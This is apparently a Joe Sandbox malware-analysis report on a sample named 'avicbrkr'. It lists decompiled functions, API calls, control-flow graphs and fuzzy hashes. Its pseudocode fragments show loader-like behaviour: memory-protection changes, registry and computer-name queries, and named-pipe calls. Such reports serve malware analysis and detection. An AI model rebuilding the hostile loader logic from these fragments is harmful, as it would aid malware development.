                      • String ID: Feb 28 2019$pnls
                      • API String ID: 2133416149-2933827253
                      • Opcode ID: 92552fb2a81f15a17927731af388391fc6f011fac4eaefb6f2899d1c2aa5eae7
                      • Instruction ID: 08cfedec2e88140137f796a21a7c0f4d4fe3553f7438b821c4e0d71f059e3cbf
                      • Opcode Fuzzy Hash: 92552fb2a81f15a17927731af388391fc6f011fac4eaefb6f2899d1c2aa5eae7
                      • Instruction Fuzzy Hash: 9B316071A00214ABDF14DF99C885BAEFBB6FF44714F148069EA01AB356CBB4E945CBD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373F05, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 324 373f05-373f3c call 373da8 327 373fa3-373faa 324->327 328 373f3e-373f5b RegQueryValueExA 324->328 329 373fd5-373fdc 327->329 330 373fac-373fb6 327->330 331 373f62-373f6e call 38f3b0 328->331 332 373f5d-373f60 328->332 335 374020-374027 329->335 336 373fde-373fe9 call 3712ea 329->336 333 373fcb 330->333 334 373fb8-373fc9 call 373eac 330->334 337 373f6f-373f79 331->337 332->331 332->337 333->329 334->329 334->333 347 373feb-374017 wsprintfA 336->347 348 37401a 336->348 339 373f7b-373f97 337->339 340 373f9a-373f9d RegCloseKey 337->340 339->340 340->327 347->348 348->335
                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • RegQueryValueExA.KERNEL32(?,Client,00000000,?,0039C06C,0000005C,00000001,?,00000000,00000000,00000000,?,00000001,0037D9E0,?,0000005C), ref: 00373F50
                        • Part of subcall function 0038F3B0: RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F3ED
                        • Part of subcall function 0038F3B0: HeapFree.KERNEL32(00000000,?), ref: 0038F423
                        • Part of subcall function 0038F3B0: GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F431
                        • Part of subcall function 0038F3B0: RtlAllocateHeap.NTDLL(00000000,00373F6C), ref: 0038F448
                        • Part of subcall function 0038F3B0: GetComputerNameW.KERNEL32(00000000,00373F6C), ref: 0038F459
                        • Part of subcall function 0038F3B0: HeapFree.KERNEL32(00000000,00000000), ref: 0038F47F
                      • RegCloseKey.ADVAPI32(?,?,00000001,0037D9E0,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00373F9D
                      • wsprintfA.USER32 ref: 00374011
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Allocate$CloseComputerFreeName$CreateOpenQueryValuelstrlenwsprintf
                      • String ID: Client
                      • API String ID: 3310993741-3236430179
                      • Opcode ID: 0a9487a24d686c2ba6a67fec9c5c8bba0bb52d04a6528501abc3c36688fcd35d
                      • Instruction ID: 2c1e85b3e23481d0d88e56dfffc2a8b1bb68d0236670d0216339e02ac27f4486
                      • Opcode Fuzzy Hash: 0a9487a24d686c2ba6a67fec9c5c8bba0bb52d04a6528501abc3c36688fcd35d
                      • Instruction Fuzzy Hash: ED316D71910208EFEB239F99DC49BAE7BBCEB04B10F019156F908E6290D7769A408F60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373E0D, Relevance: 6.1, APIs: 4, Instructions: 67memoryregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 349 373e0d-373e2d call 373da8 352 373ea4-373ea9 349->352 353 373e2f-373e4b RegQueryValueExA 349->353 354 373e4d-373e64 RtlAllocateHeap 353->354 355 373e9a-373ea3 RegCloseKey 353->355 356 373e97-373e99 354->356 357 373e66-373e79 354->357 355->352 356->355 359 373e85-373e95 HeapFree 357->359 360 373e7b-373e83 357->360 359->355 360->355
                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                      • HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                      • RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateFreeOpenQueryValuelstrlen
                      • String ID:
                      • API String ID: 2305150588-0
                      • Opcode ID: 6d6e8ae5c9eb421624f4654d8896f59805ca335135f62f7f7208fcbb841930ea
                      • Instruction ID: 1db8bb7fbc323362f5592b25c46bfdd44d4058c6bb97a0424a733254e406bd4d
                      • Opcode Fuzzy Hash: 6d6e8ae5c9eb421624f4654d8896f59805ca335135f62f7f7208fcbb841930ea
                      • Instruction Fuzzy Hash: 801128B3510109FFDB129F94DC89CAE7B7EFB88354B114426F90593220E7769E51AB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16memorythreadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 361 401000-40101c GetModuleHandleA HeapCreate 362 401026 GetLastError 361->362 363 40101e-40101f call 401649 361->363 364 40102c-40102d ExitThread 362->364 366 401024 363->366 366->364
                      C-Code - Quality: 100%
                      			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401649(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






                      0x00401012
                      0x00401014
                      0x0040101c
                      0x00401026
                      0x0040101e
                      0x0040101f
                      0x0040101f
                      0x0040102d

                      APIs
                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
                      • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
                      • GetLastError.KERNEL32 ref: 00401026
                      • ExitThread.KERNEL32 ref: 0040102D
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 00401649: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401700
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401714
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorExitHandleLast$CloseCodeObjectSingleWait$HeapModuleTerminate
                      • String ID:
                      • API String ID: 1018212157-0
                      • Opcode ID: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction ID: d49e082437a9ef023ccd0a11086753c1fee01878f1312c092d0fc4a9b36bd46a
                      • Opcode Fuzzy Hash: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction Fuzzy Hash: E2D0C735640310A7F6212BB15F4DB4B3918AF04789F144531F745F50E0CAF94440C66D
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00591F6C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 56c0fb666169165849a03f5a0064763a04edfeef9294ff25eed876853fa60885
                      • Instruction ID: d520488bd1e4f50ea10e9bf1dd855d38af9aed1c6fecfd3df1139310a72e7534
                      • Opcode Fuzzy Hash: 56c0fb666169165849a03f5a0064763a04edfeef9294ff25eed876853fa60885
                      • Instruction Fuzzy Hash: D461BBB4E047189FCB14CF99C984A9DFBF1BF88300F11896AE858AB355D774A985CF81
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037D752, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000000,0037D9CC,?,pnls,?,00000001,0037D9CC), ref: 0037D786
                        • Part of subcall function 00374EA4: HeapFree.KERNEL32(00000000,0037D7B1,00000000), ref: 00374F14
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037D7E6
                        • Part of subcall function 0038A7A2: memcpy.NTDLL(?,3BF08B00,A11674F3,A11674F4,00000000,00000000,00000000), ref: 0038A892
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeapTime$FileSystemmemcpy
                      • String ID: pnls
                      • API String ID: 7926421-141991303
                      • Opcode ID: c5b06e94176a8a815048368481ff4f15b058d94838a316e29a2df43f494eebde
                      • Instruction ID: c5bda3202328fcc9873596fbb790ed7ffbbec611fb4d587dfe97f50e22ee8e4f
                      • Opcode Fuzzy Hash: c5b06e94176a8a815048368481ff4f15b058d94838a316e29a2df43f494eebde
                      • Instruction Fuzzy Hash: 3611E8B6800208FBDF12EBA4DD46ADE77BCEF08301F104452A605E6161DB36AA049BA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401495, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00401495(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}















                      0x0040149f
                      0x004014a4
                      0x004014b0
                      0x004014bd
                      0x004014c3
                      0x004014c5
                      0x004014cb
                      0x00401538
                      0x0040153f
                      0x0040153f
                      0x004014cd
                      0x004014d0
                      0x004014d0
                      0x004014d4
                      0x00000000
                      0x00000000
                      0x004014d6
                      0x004014da
                      0x004014f2
                      0x004014f6
                      0x0040150a
                      0x004014f8
                      0x004014f8
                      0x004014fe
                      0x00401502
                      0x00401502
                      0x004014dc
                      0x004014dc
                      0x004014e8
                      0x004014ed
                      0x004014ed
                      0x0040151b
                      0x0040151f
                      0x00401527
                      0x00401527
                      0x0040152a
                      0x0040152d
                      0x00401530
                      0x00401536
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00401536
                      0x00000000

                      APIs
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                      • GetLastError.KERNEL32 ref: 00401521
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$ErrorLast
                      • String ID:
                      • API String ID: 1469625949-0
                      • Opcode ID: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction ID: 09eb7866679b6c449c64175da2a2ea58a88de491138e230cfb810df5d0af35aa
                      • Opcode Fuzzy Hash: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction Fuzzy Hash: 6E21C672900209EFEB208F94CC80FBEB7B4FB50355F10446AE541AB1A1D3749A85DB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038783A, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$lstrlen
                      • String ID:
                      • API String ID: 386137988-0
                      • Opcode ID: 376b43b428b9c0be8d39e0cf5d34c6079d27eaca83189f80ca10041498d89766
                      • Instruction ID: f865ba125a4e39ccd66d859be2f5c2fc609a1e8e709a7de3b18d8826e3754f4d
                      • Opcode Fuzzy Hash: 376b43b428b9c0be8d39e0cf5d34c6079d27eaca83189f80ca10041498d89766
                      • Instruction Fuzzy Hash: 06117C71804308FFEB12DF54C88AB9EBBB8EF04350F218089E90497211C378DA80DBA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373DA8, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                      • RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                      • lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCreateErrorHandleLastOpenlstrlen
                      • String ID:
                      • API String ID: 3614645836-0
                      • Opcode ID: 97a6eca8fb068b9129d3e8fc598261c204925822964635bb239658bcbf71f26c
                      • Instruction ID: aa2aef5864deebde1b63d96243c92f1008c5638927675a06dbba85f7692e5fdf
                      • Opcode Fuzzy Hash: 97a6eca8fb068b9129d3e8fc598261c204925822964635bb239658bcbf71f26c
                      • Instruction Fuzzy Hash: 09F03676114108BFD7229F50DC85EEB7FACEB45350F10D016FD0996250D7799A90C7A1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038875C, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                      • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                      • CloseHandle.KERNEL32(00000000), ref: 0038879B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CloseHandleOpenWow64
                      • String ID:
                      • API String ID: 10462204-0
                      • Opcode ID: 9273dec6a411cbd1e69006d823596923789eb60a9d9291a6bcc3377930522007
                      • Instruction ID: 86b5585d3d4bedb2d2ba067a73c351bea1d7cfb6d1ae9ca48e72c65b80973012
                      • Opcode Fuzzy Hash: 9273dec6a411cbd1e69006d823596923789eb60a9d9291a6bcc3377930522007
                      • Instruction Fuzzy Hash: 04F05E75900218FF9B22AF55DD488DEBBBCEF85791B3141A6FA05E6200E7314E01D7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 005920B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93memoryCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction ID: a4096a51608fa36d4e5dbe62984bed4bae9cb6734439b3751b996c6aac777688
                      • Opcode Fuzzy Hash: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction Fuzzy Hash: 3A4179B5E006288FDB64CF68C980B89FBF1BF89310F16859AD959A7311D770AE85CF41
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037D383, Relevance: 3.1, APIs: 2, Instructions: 68memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • StrChrA.SHLWAPI(?,00000020), ref: 0037D3F3
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • HeapFree.KERNEL32(00000000,?,00000125), ref: 0037D43B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocatememcpy$CallCloseErrorLastNamedPipeQueryValuelstrlen
                      • String ID:
                      • API String ID: 3840054301-0
                      • Opcode ID: be73e7476521ab597fb4914701e121bf94567b88d4e32d945e956f1f956cdb75
                      • Instruction ID: f9b40833333a3cf408adf6279946120a657861fbe78f04b19d04b211fbf48cfe
                      • Opcode Fuzzy Hash: be73e7476521ab597fb4914701e121bf94567b88d4e32d945e956f1f956cdb75
                      • Instruction Fuzzy Hash: 2221B435A00304FBDB23ABA9DC45B9E7FBDEF44350F1040A6E549A6291DB75EE00CB61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371345, Relevance: 3.0, APIs: 2, Instructions: 48memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0037134E
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0037135D
                        • Part of subcall function 003883F6: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0037138B,?), ref: 003883FE
                        • Part of subcall function 003883F6: GetVersion.KERNEL32 ref: 0038840D
                        • Part of subcall function 003883F6: GetCurrentProcessId.KERNEL32 ref: 0038841C
                        • Part of subcall function 003883F6: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00388439
                        • Part of subcall function 003883F6: GetLastError.KERNEL32 ref: 00388458
                        • Part of subcall function 00388461: lstrcpyn.KERNEL32(00000000,003994A4,00000008), ref: 00388486
                        • Part of subcall function 00388461: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 003884DA
                        • Part of subcall function 00388461: memcpy.NTDLL(00000000,00000000,00000000,00000000,?,00000001), ref: 00388523
                        • Part of subcall function 00388461: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000001), ref: 0038853C
                        • Part of subcall function 003891B4: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891DA
                        • Part of subcall function 003891B4: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891E2
                        • Part of subcall function 003891B4: GetLastError.KERNEL32(?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 00389220
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                        • Part of subcall function 0037DCD8: StrRChrA.SHLWAPI(0039D298,00000000,0000005C), ref: 0037DD14
                        • Part of subcall function 0037DCD8: _strupr.NTDLL ref: 0037DD2A
                        • Part of subcall function 0037DCD8: lstrlen.KERNEL32(0039D298), ref: 0037DD32
                        • Part of subcall function 0037DCD8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDB2
                        • Part of subcall function 0037DCD8: RtlAddVectoredExceptionHandler.NTDLL(00000000,0037D30B), ref: 0037DDD9
                        • Part of subcall function 0037DCD8: GetLastError.KERNEL32(?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDF3
                        • Part of subcall function 0037DCD8: RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DE09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateErrorFileLast$EventExceptionHandlerModuleNameOpenTimeVectoredVirtual$AllocCloseCurrentFreeHandleHeapRemoveSystemVersionWow64_struprlstrcpynlstrlenmemcpy
                      • String ID:
                      • API String ID: 4208673994-0
                      • Opcode ID: a7f75732926ab873ce3514f9910cca6053cb109d6d6dc55c14e1dcb8773a20bb
                      • Instruction ID: 20d08d064b7bea6bbab3b8646897dfc6cef2dcc00239a36577ccb7ad6cab90bd
                      • Opcode Fuzzy Hash: a7f75732926ab873ce3514f9910cca6053cb109d6d6dc55c14e1dcb8773a20bb
                      • Instruction Fuzzy Hash: 8801F236210309BAEF236F71EC07F693BACAB00304F508826F846EA5D0EBB9C8008710
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037140E, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • InterlockedIncrement.KERNEL32(0039D18C), ref: 00371423
                        • Part of subcall function 00371345: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0037134E
                        • Part of subcall function 00371345: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0037135D
                      • InterlockedDecrement.KERNEL32(0039D18C), ref: 00371447
                        • Part of subcall function 003713D6: SetEvent.KERNEL32(0039D29C,0037D502), ref: 003713E0
                        • Part of subcall function 003713D6: CloseHandle.KERNEL32(0039D29C), ref: 003713F5
                        • Part of subcall function 003713D6: HeapDestroy.KERNEL32(0039D188), ref: 00371405
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapInterlockedTime$CloseCreateDecrementDestroyEventFileHandleIncrementSystem
                      • String ID:
                      • API String ID: 3969339125-0
                      • Opcode ID: a0c1483c7a33ea23ee1cdf43a89257b69349d2cfb2b4c11d5f06c8d04b791ff6
                      • Instruction ID: 53050abce37f4ec493f840f06a161b2adb199f894f8b7bce1d9bb5bc42b90982
                      • Opcode Fuzzy Hash: a0c1483c7a33ea23ee1cdf43a89257b69349d2cfb2b4c11d5f06c8d04b791ff6
                      • Instruction Fuzzy Hash: 6EE0DF33608221779B335FBEAC05BAEA779AB10780F02C415FA8CD1098CA28CC00D295
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038A2FC, Relevance: 2.6, APIs: 2, Instructions: 106stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                      • lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
